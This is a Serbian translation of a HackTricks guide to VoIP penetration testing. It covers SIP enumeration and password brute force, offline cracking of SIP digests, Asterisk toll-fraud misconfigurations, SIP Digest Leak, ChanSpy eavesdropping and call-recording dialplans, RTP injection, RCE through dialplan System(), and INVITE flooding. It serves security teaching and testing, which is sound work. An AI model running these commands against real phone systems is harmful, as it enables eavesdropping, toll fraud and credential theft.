35 KiB
Testiranje penetracije VoIP-a
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili da preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRIJAVU!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte Porodicu PEASS, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Osnovne informacije o VoIP-u
Za početak učenja o tome kako VoIP funkcioniše, proverite:
{% content-ref url="basic-voip-protocols/" %} basic-voip-protocols {% endcontent-ref %}
Osnovne poruke
Request name Description RFC references
------------------------------------------------------------------------------------------------------
REGISTER Register a SIP user. RFC 3261
INVITE Initiate a dialog for establishing a call. RFC 3261
ACK Confirm that an entity has received. RFC 3261
BYE Signal termination of a dialog and end a call. RFC 3261
CANCEL Cancel any pending request. RFC 3261
UPDATE Modify the state of a session without changing the state of the dialog. RFC 3311
REFER Ask recipient to issue a request for the purpose of call transfer. RFC 3515
PRACK Provisional acknowledgement. RFC 3262
SUBSCRIBE Initiates a subscription for notification of events from a notifier. RFC 6665
NOTIFY Inform a subscriber of notifications of a new event. RFC 6665
PUBLISH Publish an event to a notification server. RFC 3903
MESSAGE Deliver a text message. Used in instant messaging applications. RFC 3428
INFO Send mid-session information that does not modify the session state. RFC 6086
OPTIONS Query the capabilities of an endpoint RFC 3261
Kodovi odgovora
1xx—Privremeni odgovori
100 Trying
180 Ringing
181 Call is Being Forwarded
182 Queued
183 Session Progress
199 Early Dialog Terminated
2xx—Uspešni odgovori
200 OK
202 Accepted
204 No Notification
3xx—Odgovori na preusmeravanje
300 Multiple Choices
301 Moved Permanently
302 Moved Temporarily
305 Use Proxy
380 Alternative Service
4xx—Odgovori na greške klijenta
400 Bad Request
401 Unauthorized
402 Payment Required
403 Forbidden
404 Not Found
405 Method Not Allowed
406 Not Acceptable
407 Proxy Authentication Required
408 Request Timeout
409 Conflict
410 Gone
411 Length Required
412 Conditional Request Failed
413 Request Entity Too Large
414 Request-URI Too Long
415 Unsupported Media Type
416 Unsupported URI Scheme
417 Unknown Resource-Priority
420 Bad Extension
421 Extension Required
422 Session Interval Too Small
423 Interval Too Brief
424 Bad Location Information
425 Bad Alert Message
428 Use Identity Header
429 Provide Referrer Identity
430 Flow Failed
433 Anonymity Disallowed
436 Bad Identity-Info
437 Unsupported Certificate
438 Invalid Identity Header
439 First Hop Lacks Outbound Support
440 Max-Breadth Exceeded
469 Bad Info Package
470 Consent Needed
480 Temporarily Unavailable
481 Call/Transaction Does Not Exist
482 Loop Detected
483 Too Many Hops
484 Address Incomplete
485 Ambiguous
486 Busy Here
487 Request Terminated
488 Not Acceptable Here
489 Bad Event
491 Request Pending
493 Undecipherable
494 Security Agreement Required
5xx—Odgovori o grešci servera
500 Internal Server Error
501 Not Implemented
502 Bad Gateway
503 Service Unavailable
504 Server Time-out
505 Version Not Supported
513 Message Too Large
555 Push Notification Service Not Supported
580 Precondition Failure
6xx—Globalne greške
600 Busy Everywhere
603 Decline
604 Does Not Exist Anywhere
606 Not Acceptable
607 Unwanted
608 Rejected
Enumeracija VoIP-a
Telefonski brojevi
Jedan od prvih koraka koje Crveni tim može preduzeti je pretraga dostupnih telefonskih brojeva za kontaktiranje kompanije koristeći OSINT alate, Google pretrage ili skeniranje web stranica.
Kada dobijete telefonske brojeve, možete koristiti online usluge za identifikaciju operatera:
- https://www.numberingplans.com/?page=analysis&sub=phonenr
- https://mobilenumbertracker.com/
- https://www.whitepages.com/
- https://www.twilio.com/lookup
Znajući da li operater pruža VoIP usluge, možete identifikovati da li kompanija koristi VoIP... Štaviše, moguće je da kompanija nije angažovala VoIP usluge već koristi PSTN kartice za povezivanje svoje VoIP PBX sa tradicionalnom telefonskom mrežom.
Stvari poput automatskih odgovora ili muzike obično ukazuju na korišćenje VoIP-a.
Google Dorks
# Grandstream phones
intitle:"Grandstream Device Configuration" Password
intitle:"Grandstream Device Configuration" (intext:password & intext:"Grandstream Device Configuration" & intext:"Grandstream Networks" | inurl:cgi-bin) -.com|org
# Cisco Callmanager
inurl:"ccmuser/logon.asp"
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button"
# Cisco phones
inurl:"NetworkConfiguration" cisco
# Linksys phones
intitle:"Sipura SPA Configuration"
# Snom phones
intitle:"snom" intext:"Welcome to Your Phone!" inurl:line_login.htm
# Polycom SoundPoint IP & phones
intitle:"SoundPoint IP Configuration Utility - Registration"
"Welcome to Polycom Web Configuration Utility" "Login as" "Password"
intext: "Welcome to Polycom Web Configuration Utility" intitle:"Polycom - Configuration Utility" inurl:"coreConf.htm"
intitle:"Polycom Login" inurl:"/login.html"
intitle:"Polycom Login" -.com
# Elastix
intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL"
# FreePBX
inurl:"maint/index.php?FreePBX" intitle: "FreePBX" intext:"FreePBX Admministration"
OSINT informacije
Sve ostale OSINT informacije koje pomažu u identifikaciji korišćenog VoIP softvera biće korisne za Crveni Tim.
Enumeracija mreže
nmap
je sposoban da skenira UDP servise, ali zbog velikog broja skeniranih UDP servisa, veoma je spor i možda nije vrlo precizan sa ovom vrstom servisa.
sudo nmap --script=sip-methods -sU -p 5060 10.10.0.0/24
svmap
iz SIPVicious-a (sudo apt install sipvicious
): Lociraće SIP usluge u navedenoj mreži.svmap
je lako blokirati jer koristi User-Agentfriendly-scanner
, ali možete izmeniti kod iz/usr/share/sipvicious/sipvicious
i promeniti ga.
# Use --fp to fingerprint the services
svmap 10.10.0.0/24 -p 5060-5070 [--fp]
SIPPTS skeniranje
sa sippts: SIPPTS skeniranje je veoma brz skener za SIP servise preko UDP, TCP ili TLS. Koristi višenitno izvršavanje i može skenirati velike opsege mreža. Omogućava lako navođenje opsega porta, skeniranje kako TCP tako i UDP, korišćenje drugog metoda (podrazumevano će koristiti OPTIONS) i specificiranje drugačijeg User-Agent-a (i još više).
sippts scan -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]
[!] IP/Network: 10.10.0.0/24
[!] Port range: 5060-5080
[!] Protocol: UDP, TCP, TLS
[!] Method to scan: REGISTER
[!] Customized User-Agent: Cisco
[!] Used threads: 200
- metasploit:
auxiliary/scanner/sip/options_tcp normal No SIP Endpoint Scanner (TCP)
auxiliary/scanner/sip/options normal No SIP Endpoint Scanner (UDP)
Dodatno nabrajanje mrežnih servisa
PBX takođe može otkrivati druge mrežne servise poput:
- 69/UDP (TFTP): Ažuriranje firmware-a
- 80 (HTTP) / 443 (HTTPS): Upravljanje uređajem preko web-a
- 389 (LDAP): Alternativa za čuvanje informacija o korisnicima
- 3306 (MySQL): MySQL baza podataka
- 5038 (Manager): Omogućava korišćenje Asteriska sa drugih platformi
- 5222 (XMPP): Poruke putem Jabber-a
- 5432 (PostgreSQL): PostgreSQL baza podataka
- I drugi...
Nabrajanje metoda
Moguće je pronaći koje su metode dostupne za korišćenje na PBX-u koristeći SIPPTS enumerate
iz sippts
sippts enumerate -i 10.10.0.10
Analiziranje odgovora servera
Veoma je važno analizirati zaglavlja koja server šalje nazad ka nama, zavisno od tipa poruke i zaglavlja koje šaljemo. Pomoću SIPPTS send
alata sa sippts možemo slati personalizovane poruke, manipulišući svim zaglavljima, i analizirati odgovor.
sippts send -i 10.10.0.10 -m INVITE -ua Grandstream -fu 200 -fn Bob -fd 11.0.0.1 -tu 201 -fn Alice -td 11.0.0.2 -header "Allow-Events: presence" -sdp
Takođe je moguće dobiti podatke ako server koristi websockets. Pomoću SIPPTS wssend
alata sa sippts možemo slati personalizovane WS poruke.
sippts wssend -i 10.10.0.10 -r 443 -path /ws
Enumeracija proširenja
Proširenja u PBX (Privatna telefonska centrala) sistemu se odnose na jedinstvene interne identifikatore dodeljene pojedinačnim telefonskim linijama, uređajima ili korisnicima unutar organizacije ili preduzeća. Proširenja omogućavaju efikasno usmeravanje poziva unutar organizacije, bez potrebe za pojedinačnim spoljnim brojevima telefona za svakog korisnika ili uređaj.
svwar
iz SIPVicious (sudo apt install sipvicious
):svwar
je besplatan skener linija proširenja SIP PBX-a. Konceptualno radi slično tradicionalnim wardijalerima tako što pogađa opseg proširenja ili datu listu proširenja.
svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER
SIPPTS exten
sa sippts: SIPPTS exten identifikuje ekstenzije na SIP serveru. Sipexten može proveriti velike mreže i opsege portova.
sippts exten -i 10.10.0.10 -r 5060 -e 100-200
- metasploit: Takođe možete nabrojati ekstenzije/korisnička imena pomoću metasploita:
auxiliary/scanner/sip/enumerator_tcp normal No SIP Username Enumerator (TCP)
auxiliary/scanner/sip/enumerator normal No SIP Username Enumerator (UDP)
enumiax
(apt install enumiax
): enumIAX je alat za grube sile korisničkih imena za protokol Inter Asterisk Exchange. enumIAX može raditi u dva različita moda; Sekvencijalno pogađanje korisničkih imena ili Rečnik napad.
enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10 # Use dictionary
enumiax -v -m3 -M3 10.10.0.10
Napadi na VoIP
Brute-Force napad na lozinke - online
Nakon što su otkriveni PBX i neki produžeci/korisnička imena, Crveni tim može pokušati da se autentikuje putem metode REGISTER
na produžetak koristeći rečnik uobičajenih lozinki kako bi izvršio brute force autentikaciju.
{% hint style="danger" %} Imajte na umu da korisničko ime može biti isto kao produžetak, ali ova praksa može varirati u zavisnosti od sistema PBX-a, njegove konfiguracije i preferencija organizacije...
Ako korisničko ime nije isto kao produžetak, moraćete odrediti korisničko ime za brute-force napad. {% endhint %}
svcrack
iz SIPVicious (sudo apt install sipvicious
): SVCrack vam omogućava da probijete lozinku za određeno korisničko ime/produžetak na PBX-u.
svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 #Crack known username
svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions
SIPPTS rcrack
sa sippts: SIPPTS rcrack je udaljeni alat za probijanje lozinke za SIP usluge. Rcrack može testirati lozinke za više korisnika na različitim IP adresama i opsezima portova.
sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt
- Metasploit:
- https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb
- https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack_tcp.rb
Snifing VoIP
Ako pronađete VoIP opremu unutar Otvorenog Wifi mreže, možete snifovati sve informacije. Štaviše, ako se nalazite unutar nešto zatvorenije mreže (povezani preko Ethernet-a ili zaštićenog Wifija) možete izvesti MitM napade kao što su ARPspoofing između PBX-a i gateway-a kako biste snifovali informacije.
Među informacijama o mreži, možete pronaći web kredencijale za upravljanje opremom, korisničke ekstenzije, korisničko ime, IP adrese, čak i hashovane lozinke i RTP pakete koje možete reprodukovati kako biste čuli razgovor, i još mnogo toga.
Da biste dobili ove informacije, možete koristiti alate poput Wireshark, tcpdump... ali posebno kreiran alat za snifovanje VoIP razgovora je ucsniff.
{% hint style="danger" %}
Imajte na umu da ako se TLS koristi u SIP komunikaciji nećete moći videti SIP komunikaciju u čistom obliku.
Isto će se desiti ako se koristi SRTP i ZRTP, RTP paketi neće biti u čitljivom tekstu.
{% endhint %}
SIP kredencijali (Bruteforce lozinke - offline)
Pogledajte ovaj primer da biste bolje razumeli SIP REGISTER komunikaciju kako biste saznali kako se kredencijali šalju.
sipdump
&sipcrack
, deo sipcrack (apt-get install sipcrack
): Ovi alati mogu izvući iz pcap datoteke digest autentifikacije unutar SIP protokola i bruteforce-ovati ih.
sipdump -p net-capture.pcap sip-creds.txt
sipcrack sip-creds.txt -w dict.txt
SIPPTS dump
sa sippts: SIPPTS dump može izvući digest autentikacije iz pcap datoteke.
sippts dump -f capture.pcap -o data.txt
SIPPTS dcrack
sa sippts: SIPPTS dcrack je alatka za dešifrovanje autentikacija digesta dobijenih sa SIPPTS dumpom.
sippts dcrack -f data.txt -w wordlist/rockyou.txt
SIPPTS tshark
sa sippts: SIPPTS tshark izvlači podatke SIP protokola iz PCAP datoteke.
sippts tshark -f capture.pcap [-filter auth]
DTMF kodovi
Ne samo SIP kredencijali mogu se pronaći u mrežnom saobraćaju, takođe je moguće pronaći DTMF kodove koji se koriste, na primer, za pristup poštanskom sandučetu.
Moguće je poslati ove kodove u INFO SIP porukama, u audio formatu ili unutar RTP paketa. Ako su kodovi unutar RTP paketa, možete isecati taj deo razgovora i koristiti alatku multimo za njihovo izdvajanje:
multimon -a DTMF -t wac pin.wav
Besplatni pozivi / Nesporazumi u konfiguraciji Asterisk konekcija
U Asterisku je moguće dozvoliti konekciju sa određene IP adrese ili sa bilo koje IP adrese:
host=10.10.10.10
host=dynamic
Ako je navedena IP adresa, domaćin neće morati slati REGISTER zahteve povremeno (u REGISTER paketu se šalje vreme života, obično 30 minuta, što znači da u drugom scenariju telefon mora ponovo da se registruje svakih 30 minuta). Međutim, moraće imati otvorene portove koji omogućavaju konekcije sa VoIP serverom radi primanja poziva.
Za definisanje korisnika mogu se koristiti sledeće oznake:
type=user
: Korisnik može samo primati pozive kao korisnik.type=friend
: Moguće je obavljati pozive kao vršnjak i primati ih kao korisnik (koristi se sa ekstenzijama)type=peer
: Moguće je slati i primati pozive kao vršnjak (SIP-trunkovi)
Takođe je moguće uspostaviti poverenje sa nesigurnom promenljivom:
insecure=port
: Dozvoljava vršnjacima konekcije validirane preko IP adrese.insecure=invite
: Ne zahteva autentifikaciju za INVITE porukeinsecure=port,invite
: Obe opcije
{% hint style="warning" %}
Kada se koristi type=friend
, vrednost promenljive host neće biti korišćena, pa ako administrator pogrešno konfiguriše SIP-trunk koristeći tu vrednost, svako će moći da se poveže sa njim.
Na primer, ova konfiguracija bi bila ranjiva:
host=10.10.10.10
insecure=port,invite
type=friend
{% endhint %}
Besplatni Pozivi / Netačne Konfiguracije Konteksta u Asterisku
U Asterisku, kontekst je nazvani kontejner ili sekcija u planu biranja koji grupiše povezane ekstenzije, akcije i pravila. Plan biranja je osnovna komponenta sistema Asterisk, jer definiše kako se obrađuju i usmeravaju dolazni i odlazni pozivi. Konteksti se koriste za organizovanje plana biranja, upravljanje kontrolom pristupa i pružanje razdvajanja između različitih delova sistema.
Svaki kontekst je definisan u konfiguracionom fajlu, obično u fajlu extensions.conf
. Konteksti se označavaju uglastim zagradama, sa imenom konteksta unutar njih. Na primer:
csharpCopy code[my_context]
Unutar konteksta, definišete ekstenzije (obrasce biranih brojeva) i povezujete ih sa nizom akcija ili aplikacija. Ove akcije određuju kako će poziv biti obrađen. Na primer:
[my_context]
exten => 100,1,Answer()
exten => 100,n,Playback(welcome)
exten => 100,n,Hangup()
Ovaj primer demonstrira jednostavan kontekst nazvan "moj_kontekst" sa ekstenzijom "100". Kada neko birne 100, poziv će biti prihvaćen, reprodukovaće se poruka dobrodošlice, a zatim će poziv biti završen.
Ovo je još jedan kontekst koji omogućava pozivanje bilo kog drugog broja:
[external]
exten => _X.,1,Dial(SIP/trunk/${EXTEN})
Ako administrator definiše podrazumevani kontekst kao:
[default]
include => my_context
include => external
{% hint style="warning" %} Bilo ko će moći da koristi server da pozove bilo koji drugi broj (a administrator servera će platiti poziv). {% endhint %}
{% hint style="danger" %}
Štaviše, podrazumevano sip.conf
datoteka sadrži allowguest=true
, što znači da će bilo koji napadač bez autentikacije moći da pozove bilo koji drugi broj.
{% endhint %}
SIPPTS invite
sa sippts: SIPPTS invite proverava da li nam PBX server dozvoljava da vršimo pozive bez autentikacije. Ako je SIP server netačno konfigurisan, dozvoliće nam da vršimo pozive ka spoljnim brojevima. Takođe može da nam dozvoli da preusmerimo poziv ka drugom spoljnom broju.
Na primer, ako vaš Asterisk server ima lošu konfiguraciju konteksta, možete prihvatiti INVITE zahtev bez autorizacije. U tom slučaju, napadač može vršiti pozive ne znajući korisničko ime/šifru.
{% code overflow="wrap" %}
# Trying to make a call to the number 555555555 (without auth) with source number 200.
sippts invite -i 10.10.0.10 -fu 200 -tu 555555555 -v
# Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444.
sippts invite -i 10.10.0.10 -tu 555555555 -t 444444444
{% endcode %}
Besplatni pozivi / Nekonfigurisani IVRS
IVRS označava Interaktivni sistem za odgovor na glas, telefonsku tehnologiju koja omogućava korisnicima da komuniciraju sa računarskim sistemom putem glasa ili tastera na dodir. IVRS se koristi za izgradnju automatizovanih sistema za upravljanje pozivima koji nude različite funkcionalnosti, kao što su pružanje informacija, usmeravanje poziva i prikupljanje korisničkih unosa.
IVRS u VoIP sistemima obično se sastoji od:
- Glasovnih poruka: Prethodno snimljeni audio zapisi koji vode korisnike kroz opcije menija IVR-a i uputstva.
- DTMF (Dual-Tone Multi-Frequency) signalizacija: Unosi tastera na telefonu generisani pritiskom tastera, koji se koriste za navigaciju kroz menije IVR-a i unos podataka.
- Usmeravanje poziva: Usmeravanje poziva ka odgovarajućoj destinaciji, kao što su određeni departmani, agenti ili ekstenzije na osnovu korisničkog unosa.
- Prikupljanje korisničkih unosa: Sakupljanje informacija od pozivaoca, kao što su brojevi računa, ID slučaja ili bilo koji drugi relevantni podaci.
- Integracija sa spoljnim sistemima: Povezivanje IVR sistema sa bazama podataka ili drugim softverskim sistemima radi pristupa ili ažuriranja informacija, obavljanja akcija ili pokretanja događaja.
U Asterisk VoIP sistemu, možete kreirati IVR koristeći plan biranja (extensions.conf
fajl) i različite aplikacije poput Background()
, Playback()
, Read()
i drugih. Ove aplikacije vam pomažu da reprodukujete glasovne poruke, prikupite korisničke unose i kontrolišete tok poziva.
Primer ranjive konfiguracije
exten => 0,100,Read(numbers,the_call,,,,5)
exten => 0,101,GotoIf("$[${numbers}"="1"]?200)
exten => 0,102,GotoIf("$[${numbers}"="2"]?300)
exten => 0,103,GotoIf("$[${numbers}"=""]?100)
exten => 0,104,Dial(LOCAL/${numbers})
Prethodni je primer gde se korisnika traži da pritisne 1 da pozove odeljenje, 2 da pozove drugo, ili kompletan broj ekstenzije ako je zna.
Ranjivost je u tome što dužina naznačene ekstenzije nije proverena, tako da korisnik može uneti potpuni broj tokom 5 sekundi i biće pozvan.
Ubacivanje ekstenzije
Korišćenjem ekstenzije poput:
exten => _X.,1,Dial(SIP/${EXTEN})
Gde je ${EXTEN}
produžetak koji će biti pozvan, kada se unese ext 101 ovo bi se desilo:
exten => 101,1,Dial(SIP/101)
Međutim, ako ${EXTEN}
dozvoljava unošenje više od brojeva (kao u starijim verzijama Asteriska), napadač bi mogao uneti 101&SIP123123123
da bi pozvao broj telefona 123123123. A ovo bi bio rezultat:
exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)
Dakle, poziv na ekstenziju 101
i 123123123
će biti poslat i samo će prvi dobiti poziv biti uspostavljen... ali ako napadač koristi ekstenziju koja zaobilazi bilo koji podudarajući koji se vrši ali ne postoji, on bi mogao ubaciti poziv samo na željeni broj.
Ranjivost SIPDigestLeak
SIP Digest Leak je ranjivost koja utiče na veliki broj SIP telefona, uključujući i hardverske i softverske IP telefone, kao i telefonske adaptere (VoIP za analogni). Ranjivost omogućava procurivanje odgovora na Digest autentikaciju, koji se izračunava iz lozinke. Tada je moguć napad na lozinku van mreže i može se povratiti većina lozinki na osnovu odgovora na izazov.
**Scenario ranjivosti odavde**:
- IP telefon (žrtva) sluša na bilo kojem portu (na primer: 5060), prihvata pozive
- Napadač šalje INVITE IP telefonu
- Telefon žrtve počinje zvoniti i neko se javlja i prekida vezu (jer niko ne odgovara na telefon s druge strane)
- Kada se telefon prekine, telefon žrtve šalje BYE napadaču
- Napadač izdaje odgovor 407 koji traži autentikaciju i izdaje izazov za autentikaciju
- Telefon žrtve pruža odgovor na izazov za autentikaciju u drugom BYE
- Napadač tada može izvršiti napad brute-force na odgovor izazova na svojoj lokalnoj mašini (ili distribuiranoj mreži itd.) i pogoditi lozinku
- SIPPTS leak sa sippts: SIPPTS leak iskorišćava ranjivost SIP Digest Leak koja utiče na veliki broj SIP telefona. Izlaz se može sačuvati u formatu SipCrack kako bi se izvršio napad brute-force korišćenjem SIPPTS dcrack ili alata SipCrack.
sippts leak -i 10.10.0.10
[!] Target: 10.10.0.10:5060/UDP
[!] Caller: 100
[!] Callee: 100
[=>] Request INVITE
[<=] Response 100 Trying
[<=] Response 180 Ringing
[<=] Response 200 OK
[=>] Request ACK
... waiting for BYE ...
[<=] Received BYE
[=>] Request 407 Proxy Authentication Required
[<=] Received BYE with digest
[=>] Request 200 Ok
Auth=Digest username="pepelux", realm="asterisk", nonce="lcwnqoz0", uri="sip:100@10.10.0.10:56583;transport=UDP", response="31fece0d4ff6fd524c1d4c9482e99bb2", algorithm=MD5
Click2Call
Click2Call omogućava web korisniku (koji je na primer zainteresovan za proizvod) da unese svoj broj telefona kako bi bio pozvan. Zatim će biti pozvan komercijal, i kada korisnik podigne telefon biće pozvan i povezan sa agentom.
Uobičajeni Asterisk profil za ovo je:
[web_user]
secret = complex_password
deny = 0.0.0.0/0.0.0.0
allow = 0.0.0.0/0.0.0.0
displayconnects = yes
read = system,call,log,verbose,agent,user,config,dtmf,reporting,crd,diapla
write = system,call,agent,user,config,command,reporting,originate
- Prethodni profil omogućava BILO KOJOJ IP adresi da se poveže (ako je lozinka poznata).
- Za organizovanje poziva, kao što je prethodno navedeno, nije potrebna dozvola za čitanje i potrebno je samo originirati u pisanje.
Sa ovim dozvolama, bilo koja IP adresa koja zna lozinku mogla bi se povezati i izvući previše informacija, kao što su:
# Get all the peers
exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecret:password\nEvents: off\n\nAction:Command\nCommand: sip show peers\n\nAction: logoff\n\n">&3 && cat <&3
{% endcode %}
Može se zatražiti više informacija ili akcija.
Prisluškivanje
U Asterisku je moguće koristiti komandu ChanSpy
koja označava proširenje(e) za praćenje (ili sve njih) kako bi se čule razgovori koji se odvijaju. Ova komanda mora biti dodeljena proširenju.
Na primer, exten => 333,1,ChanSpy('all',qb)
označava da ako pozovete proširenje 333, ono će pratiti sve
proširenja, početi slušati svaki put kada počne novi razgovor (b
) u tišini (q
) jer ne želimo da interagujemo s njim. Možete preći s jednog razgovora na drugi pritiskom na *
, ili označavanjem broja proširenja.
Takođe je moguće koristiti ExtenSpy
za praćenje samo jednog proširenja.
Umesto slušanja razgovora, moguće je snimiti ih u datoteke koristeći proširenje poput:
[recorded-context]
exten => _X.,1,Set(NAME=/tmp/${CONTEXT}_${EXTEN}_${CALLERID(num)}_${UNIQUEID}.wav)
exten => _X.,2,MixMonitor(${NAME})
{% endcode %}
Pozivi će biti sačuvani u /tmp
.
Takođe možete čak naterati Asterisk da izvrši skriptu koja će procuriti poziv kada se zatvori.
exten => h,1,System(/tmp/leak_conv.sh &)
RTCPBleed ranjivost
RTCPBleed je značajan sigurnosni problem koji pogađa VoIP servere zasnovane na Asterisk-u (objavljen 2017. godine). Ranjivost omogućava da se RTP (Real Time Protocol) saobraćaj, koji prenosi VoIP razgovore, interceptira i preusmeri od strane bilo koga na Internetu. Do ovoga dolazi jer RTP saobraćaj zaobilazi autentifikaciju prilikom prolaska kroz NAT (Network Address Translation) firewall-ove.
RTP proxy serveri pokušavaju da reše NAT ograničenja koja pogađaju RTC sisteme posredstvom posredovanja RTP tokova između dve ili više strana. Kada je NAT prisutan, softver RTP proxy servera često ne može da se osloni na informacije o RTP IP adresi i portu dobijene putem signalizacije (npr. SIP). Stoga, nekoliko RTP proxy servera je implementiralo mehanizam gde se takav IP i port tuplet automatski uči. Ovo se često postiže inspekcijom dolaznog RTP saobraćaja i označavanjem izvorne IP adrese i porta za bilo koji dolazni RTP saobraćaj kao onaj na koji treba odgovoriti. Ovaj mehanizam, koji se može nazvati "režim učenja", ne koristi nikakvu vrstu autentifikacije. Stoga napadači mogu slati RTP saobraćaj ka RTP proxy serveru i primati posredovan RTP saobraćaj namenjen pozivaocu ili pozvanoj strani tokom postojećeg RTP toka. Ovu ranjivost nazivamo RTP Bleed jer omogućava napadačima da primaju RTP medijske tokove namenjene legitimnim korisnicima.
Još jedno interesantno ponašanje RTP proxy servera i RTP stack-ova je da ponekad, čak i ako nisu ranjivi na RTP Bleed, oni će prihvatiti, proslediti i/ili obraditi RTP pakete sa bilo kog izvora. Stoga napadači mogu slati RTP pakete koji im mogu omogućiti da ubace svoj medijski sadržaj umesto legitimnog. Ovaj napad nazivamo RTP ubacivanje jer omogućava ubacivanje nelegitimnih RTP paketa u postojeće RTP tokove. Ova ranjivost može biti prisutna i kod RTP proxy servera i kod krajnjih tačaka.
Asterisk i FreePBX su tradicionalno koristili postavku NAT=yes
, koja omogućava da RTP saobraćaj zaobiđe autentifikaciju, što potencijalno može dovesti do nedostatka zvuka ili jednosmernog zvuka tokom poziva.
Za više informacija posetite https://www.rtpbleed.com/
SIPPTS rtpbleed
sa sippts: SIPPTS rtpbleed otkriva ranjivost RTP Bleed slanjem RTP tokova.
sippts rtpbleed -i 10.10.0.10
SIPPTS rtcpbleed
sa sippts: SIPPTS rtcpbleed otkriva ranjivost RTP Bleed slanjem RTCP tokova.
sippts rtcpbleed -i 10.10.0.10
SIPPTS rtpbleedflood
sa sippts: SIPPTS rtpbleedflood iskorišćava ranjivost RTP Bleed slanjem RTP tokova.
sippts rtpbleedflood -i 10.10.0.10 -p 10070 -v
SIPPTS rtpbleedinject
sa sippts: SIPPTS rtpbleedinject iskorišćava ranjivost RTP Bleed ubacivanjem audio fajla (WAV format).
sippts rtpbleedinject -i 10.10.0.10 -p 10070 -f audio.wav
RCE
U Asterisku na neki način uspete da dodate pravila proširenja i ponovo ih učitate (na primer, kompromitovanjem ranjivog web menadžerskog servera), moguće je dobiti RCE korišćenjem komande System
.
same => n,System(echo "Called at $(date)" >> /tmp/call_log.txt)
Postoji komanda nazvana Shell
koja se može koristiti umesto System
za izvršavanje sistemskih komandi ako je potrebno.
{% hint style="warning" %}
Ako server onemogućava korišćenje određenih karaktera u komandi System
(kao u Elastixu), proverite da li veb server dozvoljava kreiranje fajlova na neki način unutar sistema (kao u Elastixu ili trixboxu), i koristite to da kreirate skriptu za vrata pozadi i zatim koristite System
da je izvršite.
{% endhint %}
Zanimljivi lokalni fajlovi i dozvole
sip.conf
-> Sadrži šifru SIP korisnika.- Ako Asterisk server radi kao root, mogli biste ugroziti root
- mysql root korisnik možda nema nikakvu šifru.
- ovo se može iskoristiti za kreiranje novog mysql korisnika kao vrata pozadi
FreePBX
amportal.conf
-> Sadrži šifru administratora veb panela (FreePBX)FreePBX.conf
-> Sadrži šifru korisnika FreePBXuser koji se koristi za pristup bazi podataka- ovo se može iskoristiti za kreiranje novog mysql korisnika kao vrata pozadi
Elastix
Elastix.conf
-> Sadrži nekoliko šifri u čistom tekstu poput mysql root šifre, IMAPd šifre, šifre za web admina- Nekoliko foldera će pripadati kompromitovanom asterisk korisniku (ako ne radi kao root). Ovaj korisnik može čitati prethodne fajlove i takođe kontroliše konfiguraciju, pa bi mogao naterati Asterisk da učita druge binarne fajlove sa vratima pozadi prilikom izvršavanja.
RTP Injekcija
Moguće je ubaciti .wav
u razgovore koristeći alate poput rtpinsertsound
(sudo apt install rtpinsertsound
) i rtpmixsound
(sudo apt install rtpmixsound
).
Ili možete koristiti skripte sa http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/ da skenirate razgovore (rtpscan.pl
), pošaljete .wav
u razgovor (rtpsend.pl
) i ubacite buku u razgovor (rtpflood.pl
).
DoS
Postoji nekoliko načina da se pokuša postići DoS na VoIP serverima.
SIPPTS flood
sa sippts**: SIPPTS flood šalje neograničene poruke cilju.sippts flood -i 10.10.0.10 -m invite -v
SIPPTS ping
sa sippts**: SIPPTS ping pravi SIP ping da vidi vreme odgovora servera.sippts ping -i 10.10.0.10
- IAXFlooder: DoS IAX protokol koji koristi Asterisk
- inviteflood: Alat za izvođenje SIP/SDP INVITE poruka preplavljenja preko UDP/IP.
- rtpflood: Slanje nekoliko dobro oblikovanih RTP paketa. Potrebno je znati koje se RTP porte koriste (prvo snifujte).
- SIPp: Omogućava analizu i generisanje SIP saobraćaja, pa se može koristiti i za DoS.
- SIPsak: SIP švajcarski nož. Može se koristiti i za izvođenje SIP napada.
- Fuzzeri: protos-sip, voiper.
OS Ranjivosti
Najlakši način za instaliranje softvera poput Asteriska je preuzimanje OS distribucije u kojoj je već instaliran, kao što su: FreePBX, Elastix, Trixbox... Problem sa njima je što kada jednom prorade, sistem administratori možda ih neće ažurirati ponovo i ranjivosti će biti otkrivene vremenom.
Reference
- https://github.com/Pepelux/sippts/wiki
- https://github.com/EnableSecurity/sipvicious
- http://blog.pepelux.org/
- https://www.rtpbleed.com/
- https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4
- https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu Proverite PLANOVE ZA PRIJAVU!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.